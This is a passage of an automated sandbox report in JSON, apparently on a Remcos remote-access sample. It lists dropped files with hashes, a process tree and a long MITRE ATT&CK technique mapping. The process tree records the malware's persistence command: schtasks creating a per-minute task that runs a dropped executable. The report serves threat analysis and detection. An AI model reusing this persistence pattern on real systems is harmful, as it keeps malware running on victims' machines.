(PID: 3032)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "install.vbs", "file_path": "%TEMP%\\install.vbs", "file_size": 600, "sha256": "b3e4de253b0c5e99c47e880609fc092723c7c64d21b4c988186d3ac5e3d2e264", "type_tags": ["data"], "description": "data", "runtime_process": "WScript.exe (PID: 3092)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "remcos.exe.bin", "file_size": 1115073, "sha256": "c698c062c3c9a1c7f98220d6229ee5737b9084812b930771478f551625f1f889", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "Dxpserver.exe.bin", "file_size": 1115073, "sha256": "c698c062c3c9a1c7f98220d6229ee5737b9084812b930771478f551625f1f889", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}], "file_metadata": {"file_compositions": ["1 .OBJ Files (COFF) linked with LINK.EXE 12.00 (Visual Studio UNRELEASED) (build: 31101)", "1 Unknown Resource Files (build: 0)", "1 .RES Files linked with CVTRES.EXE 12.00 (Visual Studio UNRELEASED)! (build: 21005)", "1 .ASM Files assembled with MASM 12.00 (Visual Studio UNRELEASED) (build: 31101)", "80 .CPP Files (with POGO Optimization) compiled with CL.EXE 18.00 (Visual Studio UNRELEASED) (build: 31101)"], "imported_objects": ["37 .LIB Files generated with LIB.EXE 9.00 (Visual Studio 2008) (build: 30729)", "9 .C Files compiled with CL.EXE 15.00 (Visual Studio 2008) (build: 30729)", "53 .CPP Files compiled with CL.EXE 18.00 (Visual Studio UNRELEASED) (build: 21005)", "177 .C Files compiled with CL.EXE 18.00 (Visual Studio UNRELEASED) (build: 21005)", "51 .ASM Files assembled with MASM 12.00 (Visual Studio UNRELEASED) (build: 21005)", "1 .OBJ Files linked with ALIASOBJ.EXE 11.00 (Internal OLDNAMES.LIB Tool) (build: 41118)", "2 .CPP Files compiled with CL.EXE 18.00 (Visual Studio UNRELEASED) (build: 20806)"], "file_analysis": ["File contains C++ code", "File contains assembly code", "File appears to contain raw COFF/OMF content", "File was optimized using LTCG and/or POGO", "File is the product of a medium codebase (81 files)"], "total_file_compositions_imports": 544}, "processes": [{"uid": "00000000-00003444", "name": "006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe", "normalized_path": "C:\\006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe", "sha256": "006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03"}, {"uid": "00000000-00003032", "parentuid": "00000000-00003444", "name": "006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe", "normalized_path": "C:\\006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe", "sha256": "006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03"}, {"uid": "00000000-00003092", "parentuid": "00000000-00003032", "name": "WScript.exe", "normalized_path": "%WINDIR%\\System32\\WScript.exe", "command_line": "\"%TEMP%\\install.vbs\"", "sha256": "2160ba6829909eeb1d272ac4a5f43588750c0b4743477bf2b46952033b5d4b3b"}, {"uid": "00000000-00002908", "parentuid": "00000000-00003444", "name": "schtasks.exe", "normalized_path": "%WINDIR%\\System32\\schtasks.exe", "command_line": "/create /tn cttunesvr /tr \"%APPDATA%\\adprovider\\Dxpserver.exe\" /sc minute /mo 1 /F", "sha256": "15018d0093befabba8b927743191030d1f8c17bb97fdb48c2fc3eab20e2d4b3d"}, {"uid": "00000000-00001212", "name": "Dxpserver.exe", "normalized_path": "%APPDATA%\\adprovider\\Dxpserver.exe", "sha256": "c698c062c3c9a1c7f98220d6229ee5737b9084812b930771478f551625f1f889"}, {"uid": "00000000-00005116", "parentuid": "00000000-00001212", "name": "Dxpserver.exe", "normalized_path": "%APPDATA%\\adprovider\\Dxpserver.exe", "sha256": "c698c062c3c9a1c7f98220d6229ee5737b9084812b930771478f551625f1f889"}, {"uid": "00000000-00005492", "parentuid": "00000000-00005116", "name": "WScript.exe", "normalized_path": "%WINDIR%\\System32\\WScript.exe", "command_line": "\"%TEMP%\\install.vbs\"", "sha256": "2160ba6829909eeb1d272ac4a5f43588750c0b4743477bf2b46952033b5d4b3b"}, {"uid": "00000000-00005720", "parentuid": "00000000-00001212", "name": "schtasks.exe", "normalized_path": "%WINDIR%\\System32\\schtasks.exe", "command_line": "/create /tn cttunesvr /tr \"%APPDATA%\\adprovider\\Dxpserver.exe\" /sc minute /mo 1 /F", "sha256": "15018d0093befabba8b927743191030d1f8c17bb97fdb48c2fc3eab20e2d4b3d"}, {"uid": "00000000-00005216", "name": "Dxpserver.exe", "normalized_path": "%APPDATA%\\adprovider\\Dxpserver.exe", "sha256": "c698c062c3c9a1c7f98220d6229ee5737b9084812b930771478f551625f1f889"}, {"uid": "00000000-00003312", "parentuid": "00000000-00005216", "name": "Dxpserver.exe", "normalized_path": "%APPDATA%\\adprovider\\Dxpserver.exe", "sha256": "c698c062c3c9a1c7f98220d6229ee5737b9084812b930771478f551625f1f889"}, {"uid": "00000000-00005532", "parentuid": "00000000-00003312", "name": "WScript.exe", "normalized_path": "%WINDIR%\\System32\\WScript.exe", "command_line": "\"%TEMP%\\install.vbs\"", "sha256": "2160ba6829909eeb1d272ac4a5f43588750c0b4743477bf2b46952033b5d4b3b"}, {"uid": "00000000-00005352", "parentuid": "00000000-00005216", "name": "schtasks.exe", "normalized_path": "%WINDIR%\\System32\\schtasks.exe", "command_line": "/create /tn cttunesvr /tr \"%APPDATA%\\adprovider\\Dxpserver.exe\" /sc minute /mo 1 /F", "sha256": "15018d0093befabba8b927743191030d1f8c17bb97fdb48c2fc3eab20e2d4b3d"}, {"uid": "00000000-00005804", "name": "remcos.exe", "normalized_path": "%APPDATA%\\remcos\\remcos.exe", "sha256": "c698c062c3c9a1c7f98220d6229ee5737b9084812b930771478f551625f1f889"}, {"uid": "00000000-00004900", "parentuid": "00000000-00005804", "name": "remcos.exe", "normalized_path": "%APPDATA%\\remcos\\remcos.exe", "sha256": "c698c062c3c9a1c7f98220d6229ee5737b9084812b930771478f551625f1f889"}, {"uid": "00000000-00002176", "parentuid": "00000000-00004900", "name": "iexplore.exe", "normalized_path": "%PROGRAMFILES%\\Internet Explorer\\iexplore.exe", "sha256": "8abc7daa81c8a20bfd88b6a60ecc9ed1292fbb6cedbd6f872f36512d9a194bba"}, {"uid": "00000000-00005868", "parentuid": "00000000-00002176", "name": "iexplore.exe", "normalized_path": "%PROGRAMFILES%\\Internet Explorer\\iexplore.exe", "sha256": "8abc7daa81c8a20bfd88b6a60ecc9ed1292fbb6cedbd6f872f36512d9a194bba"}, {"uid": "00000000-00005920", "parentuid": "00000000-00002176", "name": "schtasks.exe", "normalized_path": "%WINDIR%\\System32\\schtasks.exe", "command_line": "/create /tn cttunesvr /tr \"%APPDATA%\\adprovider\\Dxpserver.exe\" /sc minute /mo 1 /F", "sha256": "15018d0093befabba8b927743191030d1f8c17bb97fdb48c2fc3eab20e2d4b3d"}, {"uid": "00000000-00006032", "parentuid": "00000000-00005804", "name": "schtasks.exe", "normalized_path": "%WINDIR%\\System32\\schtasks.exe", "command_line": "/create /tn cttunesvr /tr \"%APPDATA%\\adprovider\\Dxpserver.exe\" /sc minute /mo 1 /F", "sha256": "15018d0093befabba8b927743191030d1f8c17bb97fdb48c2fc3eab20e2d4b3d"}, {"uid": "00000000-00005644", "name": "Dxpserver.exe", "normalized_path": "%APPDATA%\\adprovider\\Dxpserver.exe", "sha256": "c698c062c3c9a1c7f98220d6229ee5737b9084812b930771478f551625f1f889"}, {"uid": "00000000-00005640", "parentuid": "00000000-00005644", "name": "Dxpserver.exe", "normalized_path": "%APPDATA%\\adprovider\\Dxpserver.exe", "sha256": "c698c062c3c9a1c7f98220d6229ee5737b9084812b930771478f551625f1f889"}, {"uid": "00000000-00005888", "parentuid": "00000000-00005640", "name": "WScript.exe", "normalized_path": "%WINDIR%\\System32\\WScript.exe", "command_line": "\"%TEMP%\\install.vbs\"", "sha256": "2160ba6829909eeb1d272ac4a5f43588750c0b4743477bf2b46952033b5d4b3b"}, {"uid": "00000000-00005860", "parentuid": "00000000-00005644", "name": "schtasks.exe", "normalized_path": "%WINDIR%\\System32\\schtasks.exe", "command_line": "/create /tn cttunesvr /tr \"%APPDATA%\\adprovider\\Dxpserver.exe\" /sc minute /mo 1 /F", "sha256": "15018d0093befabba8b927743191030d1f8c17bb97fdb48c2fc3eab20e2d4b3d"}], "mitre_attcks": [{"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "suspicious_identifiers_count": 7, "informative_identifiers_count": 15}, {"tactic": "Execution", "technique": "Inter-Process Communication", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559", "informative_identifiers_count": 2}, {"tactic": "Execution", "technique": "Windows Command Shell", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003", "informative_identifiers_count": 1, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Execution", "technique": "Scheduled Task", "attck_id": "T1053.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1053/005", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "parent": {"technique": "Scheduled Task/Job", "attck_id": "T1053", "attck_id_wiki": "https://attack.mitre.org/techniques/T1053"}}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 4}, {"tactic": "Execution", "technique": "Service Execution", "attck_id": "T1569.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569/002", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "System Services", "attck_id": "T1569", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569"}}, {"tactic": "Execution", "technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059", "suspicious_identifiers_count": 1}, {"tactic": "Execution", "technique": "Visual Basic", "attck_id": "T1059.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/005", "suspicious_identifiers_count": 1, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Execution", "technique": "Component Object Model", "attck_id": "T1559.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Inter-Process Communication", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559"}}, {"tactic": "Persistence", "technique": "Account Manipulation", "attck_id": "T1098", "attck_id_wiki": "https://attack.mitre.org/techniques/T1098", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Shortcut Modification", "attck_id": "T1547.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/009", "informative_identifiers_count": 2, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "malicious_identifiers_count": 1, "informative_identifiers_count": 4, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Persistence", "technique": "Scheduled Task", "attck_id": "T1053.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1053/005", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "parent": {"technique": "Scheduled Task/Job", "attck_id": "T1053", "attck_id_wiki": "https://attack.mitre.org/techniques/T1053"}}, {"tactic": "Persistence", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Persistence", "technique": "Kernel Modules and Extensions", "attck_id": "T1547.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/006", "malicious_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 2}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Persistence", "technique": "Winlogon Helper DLL", "attck_id": "T1547.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/004", "suspicious_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "suspicious_identifiers_count": 4, "informative_identifiers_count": 4, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "Create Process with Token", "attck_id": "T1134.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/002", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Account Manipulation", "attck_id": "T1098", "attck_id_wiki": "https://attack.mitre.org/techniques/T1098", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 5, "suspicious_identifiers_count": 3, "informative_identifiers_count": 3}, {"tactic": "Privilege Escalation", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Process Hollowing", "attck_id": "T1055.012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/012", "malicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Shortcut Modification", "attck_id": "T1547.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/009", "informative_identifiers_count": 2, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "malicious_identifiers_count": 1, "informative_identifiers_count": 4, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Privilege Escalation", "technique": "Bypass User Account Control", "attck_id": "T1548.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1548/002", "informative_identifiers_count": 1, "parent": {"technique": "Abuse Elevation Control Mechanism", "attck_id": "T1548", "attck_id_wiki": "https://attack.mitre.org/techniques/T1548"}}, {"tactic": "Privilege Escalation", "technique": "Scheduled Task", "attck_id": "T1053.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1053/005", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "parent": {"technique": "Scheduled Task/Job", "attck_id": "T1053", "attck_id_wiki": "https://attack.mitre.org/techniques/T1053"}}, {"tactic": "Privilege Escalation", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "Portable Executable Injection", "attck_id": "T1055.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/002", "malicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Privilege Escalation", "technique": "Kernel Modules and Extensions", "attck_id": "T1547.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/006", "malicious_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Abuse Elevation Control Mechanism", "attck_id": "T1548", "attck_id_wiki": "https://attack.mitre.org/techniques/T1548", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Winlogon Helper DLL", "attck_id": "T1547.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/004", "suspicious_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "Make and Impersonate Token", "attck_id": "T1134.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/003", "suspicious_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "suspicious_identifiers_count": 2, "informative_identifiers_count": 5}, {"tactic": "Defense Evasion", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "suspicious_identifiers_count": 4, "informative_identifiers_count": 4, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "Create Process with Token", "attck_id": "T1134.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/002", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Timestomp", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006", "informative_identifiers_count": 3, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 2, "informative_identifiers_count": 3}, {"tactic": "Defense Evasion", "technique": "File and Directory Permissions Modification", "attck_id": "T1222", "attck_id_wiki": "https://attack.mitre.org/techniques/T1222", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070", "suspicious_identifiers_count": 2, "informative_identifiers_count": 3}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 5, "suspicious_identifiers_count": 3, "informative_identifiers_count": 3}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "suspicious_identifiers_count": 3, "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Process Hollowing", "attck_id": "T1055.012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/012", "malicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "suspicious_identifiers_count": 2, "informative_identifiers_count": 3}, {"tactic": "Defense Evasion", "technique": "Hidden Window", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003", "informative_identifiers_count": 2, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "Bypass User Account Control", "attck_id": "T1548.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1548/002", "informative_identifiers_count": 1, "parent": {"technique": "Abuse Elevation Control Mechanism", "attck_id": "T1548", "attck_id_wiki": "https://attack.mitre.org/techniques/T1548"}}, {"tactic": "Defense Evasion", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "Portable Executable Injection", "attck_id": "T1055.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/002", "malicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Match Legitimate Name or Location", "attck_id": "T1036.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036/005", "malicious_identifiers_count": 2, "parent": {"technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Disable or Modify Tools", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Impair Defenses", "attck_id": "T1562", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562"}}, {"tactic": "Defense Evasion", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Abuse Elevation Control Mechanism", "attck_id": "T1548", "attck_id_wiki": "https://attack.mitre.org/techniques/T1548", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Masquerade File Type", "attck_id": "T1036.008", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036/008", "suspicious_identifiers_count": 1, "parent": {"technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}}, {"tactic": "Defense Evasion", "technique": "Deobfuscate/Decode Files or Information", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Dynamic API Resolution", "attck_id": "T1027.007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/007", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": 